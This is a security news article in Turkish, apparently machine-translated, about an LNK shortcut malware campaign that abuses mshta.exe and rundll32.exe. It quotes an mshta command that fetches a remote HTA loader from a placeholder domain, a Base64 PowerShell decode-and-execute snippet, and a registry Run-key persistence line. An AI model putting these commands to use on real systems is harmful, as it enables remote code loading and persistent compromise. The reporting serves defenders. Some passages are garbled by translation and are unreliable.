Kötü niyetli Windows kısayol dosyalarından (.lnk) yararlanan son saldırılar dalgası, güvenlik ekiplerini yüksek alarma koydu.
Ağustos 2025’in sonlarında ortaya çıkan bu yeni LNK kötü amaçlı yazılım dağıtım, son nokta korumalarını atlamak ve şüpheleri artırmadan yükleri yürütmek için güvenilir Microsoft ikili dosyalarını kullanıyor.
Öncelikle mızrak aktı e-postaları ve tehlikeye atılan web siteleri aracılığıyla teslim edilen kısayol dosyaları, ek kötü amaçlı yazılım bileşenleri getirmeye ve başlatmaya meşru Windows yardımcı programlarını çağıran zararsız, gömme komutları görünür.
Erken kurbanlar, genellikle iyi huylu sistem aktivitesi olarak reddedilen anormal Powershell çağrıları ve beklenmedik ağ bağlantıları gibi ince uzlaşma göstergeleri bildirdiler.
Araştırmacılar, kampanyanın, yüksek ayrıcalıklara sahip kullanıcılara odaklanarak hem işletme hem de tüketici uç noktalarını hedeflediğini gözlemledi.
İlk cazibe e -postaları dahili BT bildirimlerini veya güvenlik uyarılarını taklit ederek alıcıları görünüşte zararsız bir kısayol ekini tıklamaya teşvik eder.
Yürütme üzerine, LNK dosyası Windows Gezgini’ni gizli bir yük yüklemek için tetikler ve etkin bir şekilde silahlandırılmış yerleşik ikili dosyaları mshta.exe Ve rundll32.exe Saldırıyı sahnelemek için.
Bu teknik, tehdit aktörünün tipik olarak bilinmeyen yürütülebilir dosyaların doğrudan yürütülmesini işaretleyen antivirüs imzalarından ve davranışsal algılama kurallarından kaçmasını sağlar.
K7 Güvenlik Laboratuarları analistleri, saldırganların bu yerel yardımcı programlara geçirilen kodlanmış parametrelerden yararlanmak için LNK yükünü dikkatlice hazırladığını ve sanal alan ortamları tarafından doğru analizleri önlediğini belirtti.
Birden fazla iyi huylu işlemi zincirleyerek, kötü amaçlı yazılım “arazide yaşamak” yürütülür ve diskte ve bellekte adli ayak izini azaltır.
Mağdurların bitiş noktası kütükleri, her işlemin bir sonraki aşamaya bir saniyenin altında yürütmeyi bir sonraki aşamaya teslim ederek, tespit çabalarını karmaşıklaştırdığı hızlı işlem yumurtlama olaylarını gösterir.
Enfeksiyon mekanizması ve yük dağıtım
Enfeksiyon mekanizmasına daha derin dalış yapan kötü amaçlı .lnk dosyası, uzlaşmış bir sunucuda barındırılan uzak bir HTML uygulaması (HTA) komut dosyasına işaret eden bir OLE nesnesini yerleştirir.
Bir kullanıcı kısayolu çift tıkladığında, Explorer çağırır mshta.exe Aşağıdaki komut satırı ile:-
mshta.exe "http[:]//malicious-domain.com/loader.hta" .webp)
Burada gizlenmiş yükleyici komut dosyası, sonraki aşamalı yükü indirmek için Base64 kodlu PowerShell komutlarını kullanır:-
$payload = 'aGVsbG8gd29ybGQ='
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))Bu snippet, saldırganın diskin yazdığını nasıl en aza indirdiğini göstererek bellekten basit bir komut dosyasını çözer ve yürütür.
HTA yürütüldüğünde, rundll32.exe Kötü niyetli bir DLL’yi doğrudan askıya alınmış bir içine yüklemek için svchost.exe İşlem, yürütülebilir dosya taraması atlama.
DLL, bir Win32 Kayıt Defteri Run Anahtarı oluşturarak kalıcılığın oluşturulmasından sorumludur:-
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name "Updater" -Value "rundll32.exe C:\Windows\Temp\updater.dll,EntryPoint"Kayıt defteri tabanlı kalıcılığı ve güvenilir Windows ikili dosyalarını kötüye kullanarak, kötü amaçlı yazılım, uç nokta tespitleri DLL dosyasını karantinaya çalışsa bile, kullanıcı girişinde otomatik olarak başlatılmasını sağlar.
Uzlaşma göstergeleri, şüpheli alanlara, anormal alanlara ağ isteklerini içerir mshta.exe Ve rundll32.exe CurrentVersion \ RUN tuşunun altındaki ağaçlar ve tanınmayan kayıt defteri girişleri.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
